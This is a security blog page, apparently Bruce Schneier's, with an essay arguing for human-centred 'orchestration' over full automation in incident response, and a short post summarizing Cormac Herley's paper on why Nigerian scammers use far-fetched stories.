Uncertainty demands initiative, while certainty demands synchronization. Here, again, we are heading too far down the wrong path. The purpose of all incident response tools should be to make the human responders more effective. They need both the ability and the capability to exercise it effectively.

When things are uncertain, you want your systems to be decentralized. When things are certain, centralization is more important. Good incident response teams know that decentralization goes hand in hand with initiative. And finally, a world of uncertainty prioritizes command, while a world of certainty prioritizes control. Again, effective incident response teams know this, and effective managers aren’t scared to release and delegate control.

Like the US military, we in the incident response field have shifted too much into the world of certainty. We have prioritized data collection, preplanning, synchronization, centralization and control. You can see it in the way people talk about the future of Internet security, and you can see it in the products and services offered on the show floor of the RSA Conference.

Automation, too, is fixed. Incident response needs to be dynamic and agile, because you are never certain and there is an adaptive, malicious adversary on the other end. You need a response system that has human controls and can modify itself on the fly. Automation just doesn’t allow a system to do that to the extent that’s needed in today’s environment. Just as the military shifted from trying to replace the soldier to making the best soldier possible, we need to do the same.

For some time, I have been talking about incident response in terms of OODA loops. This is a way of thinking about real-time adversarial relationships, originally developed for airplane dogfights, but much more broadly applicable. OODA stands for observe-orient-decide-act, and it’s what people responding to a cybersecurity incident do constantly, over and over again. We need tools that augment each of those four steps. These tools need to operate in a world of uncertainty, where there is never enough data to know everything that is going on. We need to prioritize understanding, execution, initiative, decentralization and command.

At the same time, we’re going to have to make all of this scale. If anything, the most seductive promise of a world of certainty and automation is that it allows defense to scale. The problem is that we’re not there yet. We can automate and scale parts of IT security, such as antivirus, automatic patching and firewall management, but we can’t yet scale incident response. We still need people. And we need to understand what can be automated and what can’t be.

The word I prefer is orchestration. Security orchestration represents the union of people, process and technology. It’s computer automation where it works, and human coordination where that’s necessary. It’s networked systems giving people understanding and capabilities for execution. It’s making those on the front lines of incident response the most effective they can be, instead of trying to replace them. It’s the best approach we have for cyberdefense.

Automation has its place. If you think about the product categories where it has worked, they’re all areas where we have pretty strong certainty. Automation works in antivirus, firewalls, patch management and authentication systems. None of them is perfect, but all those systems are right almost all the time, and we’ve developed ancillary systems to deal with it when they’re wrong.

Automation fails in incident response because there’s too much uncertainty. Actions can be automated once the people understand what’s going on, but people are still required. For example, IBM’s Watson for Cyber Security provides insights for incident response teams based on its ability to ingest and find patterns in an enormous amount of freeform data. It does not attempt a level of understanding necessary to take people out of the equation.

From within an orchestration model, automation can be incredibly powerful. But it’s the human-centric orchestration model—­ the dashboards, the reports, the collaboration—­ that makes automation work. Otherwise, you’re blindly trusting the machine. And when an uncertain process is automated, the results can be dangerous.

Technology continues to advance, and this is all a changing target. Eventually, computers will become intelligent enough to replace people at real-time incident response. My guess, though, is that computers are not going to get there by collecting enough data to be certain. More likely, they’ll develop the ability to exhibit understanding and operate in a world of uncertainty. That’s a much harder goal.

Yes, today, this is all science fiction. But it’s not stupid science fiction, and it might become reality during the lifetimes of our children. Until then, we need people in the loop. Orchestration is a way to achieve that.

This essay previously appeared on the Security Intelligence blog.

Posted on March 29, 2017 at 6:16 AM59 Comments

Far-Fetched Scams Separate the Gullible from Everyone Else

Interesting conclusion by Cormac Herley, in this paper: “Why Do Nigerian Scammers Say They are From Nigeria?

Abstract: False positives cause many promising detection technologies to be unworkable in practice. Attackers, we show, face this problem too. In deciding who to attack true positives are targets successfully attacked, while false positives are those that are attacked but yield nothing. This allows us to view the attacker’s problem as a binary classification. The most profitable strategy requires accurately distinguishing viable from non-viable users, and balancing the relative costs of true and false positives. We show that as victim density decreases the fraction of viable users than can be profitably attacked drops dramatically. For example, a 10x reduction in density can produce a 1000x reduction in the number of victims found. At very low victim densities the attacker faces a seemingly intractable Catch-22: unless he can distinguish viable from non-viable users with great accuracy the attacker cannot find enough victims to be profitable. However, only by finding large numbers of victims can he learn how to accurately distinguish the two.

Finally, this approach suggests an answer to the question in the title. Far-fetched tales of West African riches strike most as comical. Our analysis suggests that is an advantage to the attacker, not a disadvantage. Since his attack has a low density of victims the Nigerian scammer has an over-riding need to reduce false positives. By sending an email that repels all but the most gullible the scammer gets the most promising marks to self-select, and tilts the true to false positive ratio in his favor.

Posted on June 21, 2012 at 1:03 PM29 Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.